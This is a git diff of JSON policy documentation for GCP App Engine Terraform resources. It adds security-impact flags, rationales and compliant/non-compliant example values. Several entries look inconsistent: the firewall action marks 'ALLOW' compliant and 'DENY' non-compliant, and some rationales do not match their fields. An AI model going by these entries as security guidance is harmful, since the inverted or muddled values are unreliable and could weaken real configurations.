a/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_domain_mapping.json @@ -5,17 +5,17 @@ "domain_name": { "description": "Relative name of the domain serving the application. Example: example.com.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce the use of verified domains to prevent unauthorized shadow branding and ensure all application traffic is protected by corporate-standard SSL/TLS configurations", + "compliant": "hardhatenterprises.com", + "non-compliant": "unverified-domain.com", "parent": null }, "ssl_settings": { "description": "SSL configuration for this domain. If unconfigured, this domain will not serve with SSL. Structure is [documented below](#nested_ssl_settings).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Mandates the use of managed SSL settings to guarantee that all custom domain traffic is encrypted via TLS and to eliminate the risk of service downtime caused by expired manual certificates", "compliant": null, "non-compliant": null, "parent": null, @@ -23,8 +23,8 @@ "certificate_id": { "description": "ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Mandating/managing specific certificate IDs manually increases operational overhead and introduces the risk of service outages due to manual renewal failures.", "compliant": null, "non-compliant": null, "parent": "ssl_settings" @@ -32,17 +32,17 @@ "ssl_management_type": { "description": "SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are: `AUTOMATIC`, `MANUAL`.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Mandates 'AUTOMATIC' SSL management to utilise Google's managed certificate authority, ensuring renewals and the use of modern cryptographic protocols without human intervention.", + "compliant": "AUTOMATIC", + "non-compliant": "MANUAL", "parent": "ssl_settings" }, "pending_managed_certificate_id": { "description": "(Output) ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request.", "required": null, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is a read-only output attribute managed by Google Cloud, represents a transient state during certificate provisioning and cannot be influenced/configured by the user.", "compliant": null, "non-compliant": null, "parent": "ssl_settings" @@ -52,17 +52,17 @@ "override_strategy": { "description": "Whether the domain creation should override any existing mappings for this domain. By default, overrides are rejected. Default value is `STRICT`. Possible values are: `STRICT`, `OVERRIDE`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "to enforce a clear resolution strategy for domain mapping conflicts to prevent accidental hijacking of custom domains from other projects and ensure predictable routing behavior.", + "compliant": "STRICT", + "non-compliant": "OVERRIDE", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "It is a standard provider-inherited field as the resource is inherently constrained by the project-level permissions and deployment context of the authenticated service account.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json b/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json index 948e356a8..d27a50455 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_firewall_rule.json @@ -5,26 +5,26 @@ "source_range": { "description": "IP address or range, defined using CIDR notation, of requests that this rule applies to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces strict IP CIDR boundaries to minimize the application's attack surface by ensuring only trusted networks or specific geographic IP ranges can interact with the App Engine environment.", + "compliant": "192.168.1.0/24", + "non-compliant": "*", "parent": null }, "action": { "description": "The action to take if this rule matches. Possible values are: `UNSPECIFIED_ACTION`, `ALLOW`, `DENY`.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Is the explicit binary outcome for a network request, ensuring that the firewall behaves as a definitive gatekeeper rather than allowing traffic to pass through ambiguity.", + "compliant": "ALLOW", + "non-compliant": "DENY", "parent": null }, "description": { "description": "An optional string description of this rule.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is an informative field that does not influence the network logic/security enforcement of the firewall rule.", "compliant": null, "non-compliant": null, "parent": null @@ -32,17 +32,17 @@ "priority": { "description": "A positive integer that defines the order of rule evaluation. Rules with the lowest priority are evaluated first. A default rule at priority Int32.MaxValue matches all IPv4 and IPv6 traffic when no previous rule matches. Only the action of this rule can be modified by the user.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces an ordering of firewall rules to ensure that specific security 'Allow' or 'Deny' logic is evaluated in the correct sequence.", + "compliant": "1000", + "non-compliant": "2147483647", "parent": null }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "Is automatically constrained by the Google provider's project configuration, ensuring that firewall rules are strictly applied to the intended environment without manual entry.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json b/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json index 168a34b2e..32f80910e 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_flexible_app_version.json @@ -5,17 +5,17 @@ "runtime": { "description": "Desired runtime. Example python27.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure the application environment is patched against known vulnerabilities and remains compatible with organizational security tooling.", + "compliant": "nodejs", + "non-compliant": "python27", "parent": null }, "readiness_check": { "description": "Configures readiness health checking for instances. Unhealthy instances are not put into the backend traffic rotation. Structure is [documented below](#nested_readiness_check).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Mandates the configuration of health probes to ensure that the load balancer only routes traffic to fully initialized and healthy instances which prevents errors and ensures correct deployments.", "compliant": null, "non-compliant": null, "parent": null, @@ -23,17 +23,17 @@ "path": { "description": "The request path.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "to enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page.", + "compliant": "/", + "non-compliant": "/invalid-path", "parent": "readiness_check" }, "host": { "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -41,17 +41,17 @@ "failure_threshold": { "description": "Number of consecutive failed checks required before removing traffic. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Configures the specific tolerance level for failed health probes to prevent flapping.", + "compliant": "failure_threshold = 4", + "non-compliant": "failure_threshold = 0", "parent": "readiness_check" }, "success_threshold": { "description": "Number of consecutive successful checks required before receiving traffic. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -59,8 +59,8 @@ "check_interval": { "description": "Interval between health checks. Default: \"5s\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -68,17 +68,17 @@ "timeout": { "description": "Time before the check is considered failed. Default: \"4s\"", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue.", + "compliant": "4s", + "non-compliant": "30s", "parent": "readiness_check" }, "app_start_timeout": { "description": "A maximum time limit on application initialization, measured from moment the application successfully replies to a healthcheck until it is ready to serve traffic. Default: \"300s\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Application initialization times vary drastically based on language runtime, dependency loading, and cache warming requirements.", "compliant": null, "non-compliant": null, "parent": "readiness_check" @@ -88,8 +88,8 @@ "liveness_check": { "description": "Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Structure is [documented below](#nested_liveness_check).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforces the configuration of liveness probes to detect deadlocked/zombie processes that are running but no longer functional, allowing the platform to automatically restart the instance and restore service health.", "compliant": null, "non-compliant": null, "parent": null, @@ -97,17 +97,17 @@ "path": { "description": "The request path.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page.", + "compliant": "/", + "non-compliant": "/invalid-path", "parent": "liveness_check" }, "host": { - "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", + "description": "Host header to send when performing a HTTP Readiness check. Example: \"myapp.appspot.com\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured.", "compliant": null, "non-compliant": null, "parent": "liveness_check" @@ -115,17 +115,17 @@ "failure_threshold": { "description": "Number of consecutive failed checks required before considering the VM unhealthy. Default: 4.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Configures the specific tolerance level for failed health probes to prevent flapping.", + "compliant": "failure_threshold = 4", + "non-compliant": "failure_threshold = 0", "parent": "liveness_check" }, "success_threshold": { "description": "Number of consecutive successful checks required before considering the VM healthy. Default: 2.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer.", "compliant": null, "non-compliant": null, "parent": "liveness_check" @@ -133,8 +133,8 @@ "check_interval": { "description": "Interval between health checks.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise.", "compliant": null, "non-compliant": null, "parent": "liveness_check" @@ -142,17 +142,17 @@ "timeout": { "description": "Time before the check is considered failed. Default: \"4s\"", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue.", + "compliant": "4s", + "non-compliant": "30s", "parent": "liveness_check" }, "initial_delay": { "description": "The initial delay before starting to execute the checks. Default: \"300s\"", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Enforcing a universal delay could lead to premature restarts of slow-starting but healthy applications.", "compliant": null, "non-compliant": null, "parent": "liveness_check" @@ -162,17 +162,17 @@ "service": { "description": "AppEngine service resource. Can contain numbers, letters, and hyphens.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforces explicit service naming to ensure that application components are logically isolated, preventing accidental resource overwrites.", + "compliant": "default", + "non-compliant": "unauthorized-app", "parent": null }, "version_id": { "description": "Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,\"default\", \"latest\", and any name with the prefix \"ah-\".", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "to allow CI/CD pipelines to dynamically generate unique identifiers, which is essential for maintaining an immutable audit trail and enabling safe rollbacks.", "compliant": null, "non-compliant": null, "parent": null @@ -180,8 +180,8 @@ "inbound_services": { "description": "A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As primarily used to enable legacy App Engine services which are largely deprecated/irrelevant in the Flexible Environment, security for incoming traffic is instead governed by modern network and firewall policies.", "compliant": null, "non-compliant": null, "parent": null @@ -189,8 +189,8 @@ "instance_class": { "description": "Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G ManualScaling: B1, B2, B4, B8, B4_1G Defaults to F1 for AutomaticScaling and B1 for ManualScaling.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "It is a legacy parameter exclusive to the App Engine Standard environment.", "compliant": null, "non-compliant": null, "parent": null @@ -198,8 +198,8 @@ "network": { "description": "Extra network settings Structure is [documented below](#nested_network).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "App Engine Flexible automatically defaults to the 'default' VPC with managed settings and primary network security is better governed at the VPC and Firewall levels rather than through individual resource declarations.", "compliant": null, "non-compliant": null, "parent": null, @@ -263,8 +263,8 @@ "resources": { "description": "Machine resources for a version. Structure is [documented below](#nested_resources).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The hardware requirements are tied to the specific application's performance profile, imposing constraints would prevent right-sizing and could lead to resource starvation/unnecessary cloud spend.", "compliant": null, "non-compliant": null, "parent": null, @@ -310,8 +310,8 @@ "runtime_channel": { "description": "The channel of the runtime to use. Only available for some runtimes.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The platform defaults to the stable channel which ensures that applications run on production-ready environment binaries without requiring manual intervention or the risk of using experimental preview features.", "compliant": null, "non-compliant": null, "parent": null @@ -319,8 +319,8 @@ "flexible_runtime_settings": { "description": "Runtime settings for App Engine flexible environment. Structure is [documented below](#nested_flexible_runtime_settings).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "The settings are highly specific to individual language runtimes and typically govern performance tuning/debugging than compliance boundaries.", "compliant": null, "non-compliant": null, "parent": null, @@ -348,8 +348,8 @@ "beta_settings": { "description": "Metadata settings that are supplied to this version to enable beta runtime features.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Parameters are intended for temporary experimental features that are not yet part of the stable API.", "compliant": null, "non-compliant": null, "parent": null @@ -357,8 +357,8 @@ "serving_status": { "description": "Current serving status of this version. Only the versions with a SERVING status create instances and can be billed. Default value is `SERVING`. Possible values are: `SERVING`, `STOPPED`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As it governs the operational state of a version which must remain dynamic to allow automated deployments, traffic splitting and manual emergency interventions without triggering policy violations.", "compliant": null, "non-compliant": null, "parent": null @@ -366,8 +366,8 @@ "runtime_api_version": { "description": "The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "As managed internally by the selected runtime, enforcing a specific API version at the policy level would create unnecessary coupling between infrastructure code and language-specific internals.", "compliant": null, "non-compliant": null, "parent": null @@ -375,8 +375,8 @@ "handlers": { "description": "An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Flexible Environment is container-based where routing and static file handling are managed internally by the application's web server.", "compliant": null, "non-compliant": null, "parent": null, @@ -449,8 +449,8 @@ "runtime_main_executable_path": { "description": "The path or name of the app's main executable.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Within a containerized Flexible environment the execution logic is better governed by the entrypoint or the container's internal configuration and enforcing a path would break standard deployment conventions for multi-language microservices.", "compliant": null, "non-compliant": null, "parent": null @@ -458,8 +458,8 @@ "service_account": { "description": "The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To allow developers to assign unique least-privileged identities to each microservice", "compliant": null, "non-compliant": null, "parent": null @@ -467,8 +467,8 @@ "api_config": { "description": "Serving configuration for Google Cloud Endpoints. Structure is [documented below](#nested_api_config).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Is a legacy configuration for Google Cloud Endpoints Frameworks, this block would not be utilised.", "compliant": null, "non-compliant": null, "parent": null, @@ -523,8 +523,8 @@ "env_variables": { "description": "Environment variables available to the application. As these are not returned in the API request, Terraform will not detect any changes made outside of the Terraform config.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Intrinsic to the application's runtime logic.", "compliant": null, "non-compliant": null, "parent": null @@ -532,8 +532,8 @@ "default_expiration": { "description": "Duration that static files should be cached by web proxies and browsers. Only applicable if the corresponding StaticFilesHandler does not specify its own expiration time.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Cache-control requirements are dictated by the specific nature of the application's static assets.", "compliant": null, "non-compliant": null, "parent": null @@ -541,8 +541,8 @@ "nobuild_files_regex": { "description": "Files that match this pattern will not be built into this version. Only applicable for Go runtimes.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "File exclusion is more effectively managed via standardized version control ignore files and container-specific exclusion files.", "compliant": null, "non-compliant": null, "parent": null @@ -550,8 +550,8 @@ "deployment": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Is enforced to ensure that every application version is derived from a verified immutable source (such as a specific container image or source code hash).", "compliant": null, "non-compliant": null, "parent": null, @@ -559,8 +559,8 @@ "zip": { "description": "Zip File Structure is [documented below](#nested_deployment_zip).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -568,8 +568,8 @@ "files": { "description": "Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "individual file-level declarations are redundant when deploying via comprehensive archives or Container Images", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -577,8 +577,8 @@ "container": { "description": "The Docker image for the container that runs the version. Structure is [documented below](#nested_deployment_container).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To prevent configuration overlap, as in workflows where source code is the primary artifact the platform automatically generates the container via Cloud Build.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -586,8 +586,8 @@ "cloud_build_options": { "description": "Options for the build operations performed as a part of the version deployment. Only applicable when creating a version using source code directly. Structure is [documented below](#nested_deployment_cloud_build_options).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Build-time configuration is an operational concern distinct from the application's runtime security posture.", "compliant": null, "non-compliant": null, "parent": "deployment" @@ -597,8 +597,8 @@ "endpoints_api_service": { "description": "Code and application artifacts that make up this version. Structure is [documented below](#nested_endpoints_api_service).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "API management via Cloud Endpoints is a separate service layer with its own lifecycle.", "compliant": null, "non-compliant": null, "parent": null, @@ -644,8 +644,8 @@ "entrypoint": { "description": "The entrypoint for the application. Structure is [documented below](#nested_entrypoint).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure that the application starts using a predefined command-string that adheres to organizational standards", "compliant": null, "non-compliant": null, "parent": null, @@ -653,10 +653,10 @@ "shell": { "description": "The format should be a shell command that can be fed to bash -c.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to restrict/standardize the scripts executed during the deployment phase", + "compliant": "node ./app.js", + "non-compliant": "sudo node ./app.js", "parent": "entrypoint" } } @@ -664,8 +664,8 @@ "vpc_access_connector": { "description": "Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To allow for architectural flexibility, while Serverless VPC Access is required for internal-only communication, as not all workloads require connectivity to VPC-hosted resources.", "compliant": null, "non-compliant": null, "parent": null, @@ -684,8 +684,8 @@ "automatic_scaling": { "description": "Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure that every service can respond to traffic fluctuations while maintaining strict guardrails on resource consumption.", "compliant": null, "non-compliant": null, "parent": null, @@ -693,8 +693,8 @@ "cool_down_period": { "description": "The time period that the Autoscaler should wait before it starts collecting information from a new instance. This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. Default: 120s", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Prevents the App Engine autoscaler from reacting to sudden traffic spikes as new instances are ignored until the period ends.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -702,17 +702,17 @@ "cpu_utilization": { "description": "Target scaling by CPU usage. Structure is [documented below](#nested_automatic_scaling_cpu_utilization).", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to establish a standardized trigger for horizontal scaling, which ensures that the system proactively adds capacity before CPU saturation leads to increased request latency/service instability", + "compliant": "target_utilization = 0.5", + "non-compliant": "target_utilization = 0.9", "parent": "automatic_scaling" }, "max_concurrent_requests": { "description": "Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Can lead to under-utilisation and higher costs by triggering the creation of new instances before the existing ones are actually CPU/memory constrained.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -720,8 +720,8 @@ "max_idle_instances": { "description": "Maximum number of idle instances that should be maintained for this version.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Autoscaler manages idle instances automatically by default, also manually capping too low can cause performance degradation during volatile traffic spikes.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -729,8 +729,8 @@ "max_total_instances": { "description": "Maximum number of instances that should be started to handle requests for this version. Default: 20", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Avoid denial-of-service scenarios, as the application cannot scale to meet a legitimate traffic surge and resulting in request timeouts/503 errors.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -738,8 +738,8 @@ "max_pending_latency": { "description": "Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Forces requests to sit in a queue for too long before the App Engine autoscaler triggers a new instance.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -747,8 +747,8 @@ "min_idle_instances": { "description": "Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure the App Engine autoscaler can ingest performance metrics during traffic surges.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -756,8 +756,8 @@ "min_total_instances": { "description": "Minimum number of running instances that should be maintained for this version. Default: 2", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "To ensure of allowing the environment to fully de-provision resources during periods of zero activity.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -765,8 +765,8 @@ "min_pending_latency": { "description": "Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it.", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Optimal wait time before scaling is highly dependent on a specific workload", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -774,8 +774,8 @@ "request_utilization": { "description": "Target scaling by request utilization. Structure is [documented below](#nested_automatic_scaling_request_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Can be unreliable if request processing times vary whereas relying on CPU utilisation provides a more accurate measure of when an instance is actually working at its limit.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -783,8 +783,8 @@ "disk_utilization": { "description": "Target scaling by disk usage. Structure is [documented below](#nested_automatic_scaling_disk_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Typically bottlenecked by CPU or memory rather than storage.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -792,8 +792,8 @@ "network_utilization": { "description": "Target scaling by network usage. Structure is [documented below](#nested_automatic_scaling_network_utilization).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Scaling based on data throughput can be highly inconsistent while CPU-based scaling provides a more stable and accurate signal for when an instance is reaching its operational capacity.", "compliant": null, "non-compliant": null, "parent": "automatic_scaling" @@ -803,8 +803,8 @@ "manual_scaling": { "description": "A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling).", "required": false, - "security_impact": null, - "rationale": null, + "security_impact": false, + "rationale": "Lacks the ability to adjust to real-time traffic changes, which can lead to unexpected traffic spikes.", "compliant": null, "non-compliant": null, "parent": null, @@ -822,27 +822,27 @@ }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID", "compliant": null, "non-compliant": null, "parent": null }, "noop_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the application version will not be deleted.", + "required": false, + "security_impact": false, + "rationale": "Ensure that the Terraform state remains a truthful representation of the cloud environment.", "compliant": null, "non-compliant": null, "parent": null }, "delete_service_on_destroy": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "If set to true, the service will be deleted if it is the last version.", + "required": false, + "security_impact": false, + "rationale": "To prevent the accidental deletion of an entire service logical grouping when only a specific version is being decommissioned", "compliant": null, "non-compliant": null, "parent": null @@ -980,10 +980,10 @@ } }, "zip": { - "description": "", - "required": null, - "security_impact": null, - "rationale": null, + "description": "Zip", + "required": false, + "security_impact": true, + "rationale": "Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage.", "compliant": null, "non-compliant": null, "parent": null, @@ -991,10 +991,10 @@ "source_url": { "description": "Source URL", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "To ensure that the application's source code is retrieved from a managed version-controlled repository, using an immutable path.", + "compliant": "https://storage.googleapis.com/hardhat-bucket/hello-world.zip", + "non-compliant": "invalid.com", "parent": "zip" }, "files_count": { diff --git a/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json b/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json index b39323b1f..2635db0ac 100644 --- a/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json +++ b/docs/gcp/App_Engine/resource_json/app_engine_service_network_settings.json @@ -5,17 +5,17 @@ "service": { "description": "The name of the service these settings apply to.", "required": true, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Enforced to establish a verifiable network perimeter at the application layer.", + "compliant": "app-internal-service", + "non-compliant": "internal-service", "parent": null }, "network_settings": { "description": "Ingress settings for this service. Will apply to all versions. Structure is [documented below](#nested_network_settings).", "required": true, - "security_impact": null, - "rationale": null, + "security_impact": true, + "rationale": "Enforced to ensure the definition of the fundamental trust boundary of the application", "compliant": null, "non-compliant": null, "parent": null, @@ -23,19 +23,19 @@ "ingress_traffic_allowed": { "description": "The ingress settings for version or service. Default value is `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`. Possible values are: `INGRESS_TRAFFIC_ALLOWED_UNSPECIFIED`, `INGRESS_TRAFFIC_ALLOWED_ALL`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY`, `INGRESS_TRAFFIC_ALLOWED_INTERNAL_AND_LB`.", "required": false, - "security_impact": null, - "rationale": null, - "compliant": null, - "non-compliant": null, + "security_impact": true, + "rationale": "Is enforced to mitigate the risk of direct-to-origin attacks from occurring. By ensuring that the default unshielded App Engine URL is disabled.", + "compliant": "INGRESS_TRAFFIC_ALLOWED_INTERNAL_ONLY", + "non-compliant": "INGRESS_TRAFFIC_ALLOWED_ALL", "parent": "network_settings" } } }, "project": { "description": "If it is not provided, the provider project is used.", - "required": null, - "security_impact": null, - "rationale": null, + "required": false, + "security_impact": false, + "rationale": "To automatically inherit the provider-level project ID.", "compliant": null, "non-compliant": null, "parent": null diff --git a/docs/gcp/App_Engine/resource_json/app_engine_service_split_traffic.json 